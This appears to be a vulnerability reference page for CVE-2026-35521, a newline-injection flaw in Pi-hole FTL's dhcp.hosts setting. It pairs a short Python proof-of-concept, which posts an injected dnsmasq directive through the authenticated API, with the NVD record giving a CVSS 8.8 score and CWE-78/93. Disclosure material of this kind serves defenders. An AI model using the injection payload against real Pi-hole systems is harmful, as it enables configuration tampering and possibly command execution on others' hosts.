CVE-2026-35521

import requests import urllib.parse # PoC for CVE-2026-35521: Pi-hole FTL RCE via dhcp.hosts injection # Target: Pi-hole FTL < 6.6 TARGET = "http://<PI-HOLE-IP>/api/config" API_TOKEN = "<VALID_ADMIN_TOKEN>" # The vulnerability allows injecting newline characters to append malicious dnsmasq config. # Example payload injecting a directive that could lead to command execution # (Specific command execution vector depends on dnsmasq config capabilities). # Here we inject a 'dhcp-option' directive as a proof of configuration injection. # Attacker controlled input malicious_host = "192.168.1.50,hacker-pc" # Injected configuration separator and command injected_config = "\ndhcp-option=6,8.8.8.8" # Combine to form the payload payload = malicious_host + injected_config headers = { "Authorization": f"Bearer {API_TOKEN}", "Content-Type": "application/json" } data = { "config": { "dhcp": { "hosts": payload } } } print(f"[*] Sending payload to {TARGET}...") print(f"[*] Payload content: {repr(payload)}") try: response = requests.post(TARGET, json=data, headers=headers, timeout=5) if response.status_code == 200: print("[+] Payload accepted successfully. Configuration injected.") print("[+] Check dnsmasq configuration or restart FTL to trigger the effect.") else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] An error occurred: {e}")

{"cve": {"id": "CVE-2026-35521", "sourceIdentifier": "[email protected]", "published": "2026-04-07T16:16:28.693", "lastModified": "2026-04-28T20:24:49.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FTLDNS (pihole-FTL) provides an interactive API and also generates statistics for Pi-hole's Web interface. From 6.0 to before 6.6, the Pi-hole FTL engine contains a Remote Code Execution (RCE) vulnerability in the DHCP hosts configuration parameter (dhcp.hosts). This vulnerability allows an authenticated attacker to inject arbitrary dnsmasq configuration directives through newline characters, ultimately achieving command execution on the underlying system. This vulnerability is fixed in 6.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pi-hole:ftldns:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndIncluding": "6.5", "matchCriteriaId": "8C927FF0-74A4-4F13-95A8-E80C5E80F607"}]}]}], "references": [{"url": "https://github.com/pi-hole/FTL/security/advisories/GHSA-vfmq-jrx3-wv3c", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}